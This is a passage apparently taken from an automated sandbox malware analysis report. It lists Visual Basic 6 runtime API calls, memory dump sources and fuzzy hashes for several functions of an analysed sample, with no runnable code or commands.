                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00424035
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042404D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00424069
                                                                                    • #537.MSVBVM60(?,?), ref: 00424089
                                                                                    • __vbaStrMove.MSVBVM60(?,?), ref: 00424097
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 0042409A
                                                                                    • __vbaStrMove.MSVBVM60(?,?), ref: 004240A4
                                                                                    • __vbaFreeStr.MSVBVM60(?,?), ref: 004240AC
                                                                                    • __vbaStrCat.MSVBVM60(?,?), ref: 00424100
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042410A
                                                                                    • #537.MSVBVM60(00000000), ref: 0042410E
                                                                                    • _adj_fdiv_m64.MSVBVM60(00000008,?), ref: 00424187
                                                                                    • __vbaLenBstr.MSVBVM60(?,00000008,?), ref: 004241B2
                                                                                    • __vbaFpI4.MSVBVM60(?,00000008,?), ref: 004241E0
                                                                                    • #606.MSVBVM60(00000000,?,00000008,?), ref: 004241ED
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004241F7
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004241FA
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424204
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000008,?), ref: 0042420C
                                                                                    • __vbaFreeVar.MSVBVM60(?,00000008,?), ref: 00424218
                                                                                    • #537.MSVBVM60(00000000,?,00000008,?), ref: 0042422A
                                                                                    • #537.MSVBVM60(00000000,?,00000008,?), ref: 00424242
                                                                                    • #537.MSVBVM60(00000000,?,00000008,?), ref: 0042425A
                                                                                    • #537.MSVBVM60(00000000,?,00000008,?), ref: 00424272
                                                                                    • #537.MSVBVM60(00000000,?,00000008,?), ref: 0042428A
                                                                                    • #537.MSVBVM60(00000000,?,00000008,?), ref: 004242A2
                                                                                    • #537.MSVBVM60(00000000,?,00000008,?), ref: 004242BA
                                                                                    • #537.MSVBVM60(00000000,?,00000008,?), ref: 004242D2
                                                                                    • #537.MSVBVM60(00000000,?,00000008,?), ref: 004242EA
                                                                                    • #606.MSVBVM60(00000002,00000008,?,00000008,?), ref: 00424309
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424313
                                                                                    • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00424318
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424326
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424329
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424333
                                                                                    • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00424338
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424346
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424349
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424353
                                                                                    • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00424358
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424366
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424369
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424373
                                                                                    • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00424378
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424386
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424389
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424393
                                                                                    • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00424398
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243A6
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004243A9
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243B3
                                                                                    • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 004243B8
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243C6
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004243C9
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243D3
                                                                                    • #606.MSVBVM60(00000006,00000008,00000000,?,00000008,?), ref: 004243DF
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243E9
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004243EC
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243F6
                                                                                    • #581.MSVBVM60(&H68,00000000,?,00000008,?), ref: 004243FE
                                                                                    • __vbaFpI4.MSVBVM60(?,00000008,?), ref: 00424404
                                                                                    • #537.MSVBVM60(00000000,?,00000008,?), ref: 0042440B
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424419
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042441C
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424426
                                                                                    • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 0042442B
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424439
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042443C
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424446
                                                                                    • #606.MSVBVM60(00000002,00000008,00000000,?,00000008,?), ref: 00424452
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042445C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042445F
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424469
                                                                                    • #537.MSVBVM60(00000016,00000000,?,00000008,?), ref: 0042446E
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042447C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042447F
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424489
                                                                                    • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00424495
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042449F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004244A2
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244AC
                                                                                    • #537.MSVBVM60(00000028,00000000,?,00000008,?), ref: 004244B1
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244BF
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004244C2
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244CC
                                                                                    • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 004244D8
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244E2
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004244E5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244EF
                                                                                    • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 004244F4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424502
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424505
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042450F
                                                                                    • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 0042451B
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424525
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424528
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424532
                                                                                    • #537.MSVBVM60(00000020,00000000,?,00000008,?), ref: 00424537
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424545
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424548
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424552
                                                                                    • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 0042455E
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424568
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042456B
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424575
                                                                                    • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 0042457A
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424588
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042458B
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424595
                                                                                    • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 0042459A
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245A8
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004245AB
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245B5
                                                                                    • #537.MSVBVM60(00000018,00000000,?,00000008,?), ref: 004245BA
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245C8
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004245CB
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245D5
                                                                                    • #606.MSVBVM60(00000005,00000008,00000000,?,00000008,?), ref: 004245E1
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245EB
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004245EE
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245F8
                                                                                    • #537.MSVBVM60(00000040,00000000,?,00000008,?), ref: 004245FD
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042460B
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042460E
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424618
                                                                                    • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 0042461D
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042462B
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042462E
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424638
                                                                                    • #606.MSVBVM60(00000012,00000008,00000000,?,00000008,?), ref: 00424644
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042464E
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424651
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042465B
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,?,00000008,?), ref: 00424665
                                                                                    • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042466F
                                                                                    • __vbaFreeStrList.MSVBVM60(00000033,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004247D8
                                                                                    • __vbaFreeVarList.MSVBVM60(00000009,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,?,00000008,?), ref: 0042481F
                                                                                    • #648.MSVBVM60(0000000A), ref: 00424E2A
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00424E3C
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 00424E4E
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00424E58
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00424E60
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00424E6C
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00424E74
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00424E77
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00424E87
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,004250AB,?,00000000), ref: 00425084
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00425093
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00425098
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004250A0
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004250A8
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,00000000), ref: 004250CA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$#537$BoundsGenerate$Free$#606CheckHresult$_adj_fdiv_m64$AnsiCopy$ListSystem$File$#581#648BstrCloseDestructExitOpenOverflowProcPut3RedimUnicode
                                                                                    • String ID: $&H68$&HA8$x.@
                                                                                    • API String ID: 3305104701-3742186716
                                                                                    • Opcode ID: 37f84d4a9c39c7a1c50757bcf0e40db309af58f8b6e847605082b1ec1b3a9c81
                                                                                    • Instruction ID: 7b234b66774b24242b66e43e3622a6720749bc198b4922623ead5fbfde0b20dd
                                                                                    • Opcode Fuzzy Hash: 37f84d4a9c39c7a1c50757bcf0e40db309af58f8b6e847605082b1ec1b3a9c81
                                                                                    • Instruction Fuzzy Hash: E013FA71E002289BCB25DF65DD84ADABBB9FF48301F5081EAE10AA6250DF745F85CF64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041F830 Relevance: 90.6, APIs: 60, Instructions: 579COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(00000000,660E6C30,660E0EBE), ref: 0041F894
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,0040A070,00000011), ref: 0041F8A1
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 0041F8A9
                                                                                    • __vbaUbound.MSVBVM60(00000001), ref: 0041F8B7
                                                                                    • #648.MSVBVM60(0000000A), ref: 0041F8DB
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041F8ED
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?), ref: 0041F906
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041F914
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0041F92A
                                                                                      • Part of subcall function 00411210: #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0041127A
                                                                                      • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                      • Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                      • Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                      • Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                      • Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                      • Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                      • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0041F93A
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 0041F94F
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041F95F
                                                                                    • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 0041F975
                                                                                    • __vbaLenBstr.MSVBVM60(00405414), ref: 0041F97C
                                                                                    • #648.MSVBVM60(0000000A), ref: 0041F9CC
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041F9DE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041F9FB
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FA0C
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041FA29
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FA46
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FA57
                                                                                    • #709.MSVBVM60(00000000,00406544,000000FF,00000000), ref: 0041FA6E
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FAA5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FABA
                                                                                    • #631.MSVBVM60(00000000,?,0000000A), ref: 0041FAE5
                                                                                    • __vbaStrMove.MSVBVM60(?,-00000001,0000000A), ref: 0041FAF2
                                                                                    • __vbaFreeVar.MSVBVM60(?,-00000001,0000000A), ref: 0041FAFE
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 0041FB11
                                                                                    • #570.MSVBVM60(00000000), ref: 0041FB1F
                                                                                    • __vbaPut3.MSVBVM60(00000004,0042C250,00000000), ref: 0041FB3F
                                                                                    • __vbaPut3.MSVBVM60(00000000,0042C254,00000000), ref: 0041FB50
                                                                                    • __vbaPut3.MSVBVM60(00000004,0042C24C,00000000), ref: 0041FB60
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 0041FB69
                                                                                    • __vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FB8E
                                                                                    • __vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FB9D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,-00000001,0000000A), ref: 0041FBC1
                                                                                    • __vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FBCC
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FC36
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FCEA
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FCFB
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FD43
                                                                                    • __vbaUI1I2.MSVBVM60(00000FEE), ref: 0041FD55
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FD76
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 0041FDAA
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 0041FDD8
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FE02
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 0041FE41
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 0041FE4D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(-00000001,00000FED,00000000), ref: 0041FEAB
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000), ref: 0041FEE3
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FFDF
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00420025
                                                                                    • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0042003A
                                                                                    • __vbaPut3.MSVBVM60(00000004,0042C24C,00000000), ref: 0042004A
                                                                                    • __vbaFileSeek.MSVBVM60(-0042C250,00000000), ref: 00420070
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00420095
                                                                                    • __vbaExitProc.MSVBVM60 ref: 004200A2
                                                                                    • __vbaFreeStr.MSVBVM60(00420142), ref: 00420123
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042013B
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00420159
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$Free$FileMovePut3$Bstr$#631$#516$#648CloseCopyOpenSeek$#570#594#709Construct2DestructExitListOverflowProcUbound
                                                                                    • String ID:
                                                                                    • API String ID: 380034392-0
                                                                                    • Opcode ID: db36c0f1733d6b656f6f0f21110ea2e54cb1fc60724d0d05d8831d20435b8e45
                                                                                    • Instruction ID: 84537c48718631c5227d11dd853d148d1c88204475b6f264efbcfc593f9f6461
                                                                                    • Opcode Fuzzy Hash: db36c0f1733d6b656f6f0f21110ea2e54cb1fc60724d0d05d8831d20435b8e45
                                                                                    • Instruction Fuzzy Hash: 2332CE35A00255CFCB249FA4E8857EDBBB1FF48340F54417AE405A7362DB7898C6CBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004172E5 Relevance: 67.9, APIs: 45, Instructions: 372COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004172EC
                                                                                    • #631.MSVBVM60(00000000,-00000001,?), ref: 0041731F
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00417340
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00417349
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417370
                                                                                    • #631.MSVBVM60(00000000,-00000003,0000000A,00000000), ref: 00417399
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 004173C9
                                                                                    • #631.MSVBVM60(00000000,-00000002,0000000A,00000000), ref: 004173F1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00417414
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00417420
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$Error$#631System$#616ListUnlock$BoundsBstrGenerate$CopyLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1595817071-0
                                                                                    • Opcode ID: fb2a2bfa88c22efa9ac14300410e64a9e07382cf4d2ae5499a4c189e4441db04
                                                                                    • Instruction ID: 643dac4b4df38dfcdabcb7d24b6f5cff0a220186fca35a0c0bc2019b66c0cc28
                                                                                    • Opcode Fuzzy Hash: fb2a2bfa88c22efa9ac14300410e64a9e07382cf4d2ae5499a4c189e4441db04
                                                                                    • Instruction Fuzzy Hash: 78E119B0E002189BDB14DFA5DD84AEEBBB9FF48300F50856EE50AE7250DB745986CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041725A Relevance: 58.8, APIs: 39, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 00417261
                                                                                    • #631.MSVBVM60(00000000,-00000001,?), ref: 00417294
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004172B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004172BE
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
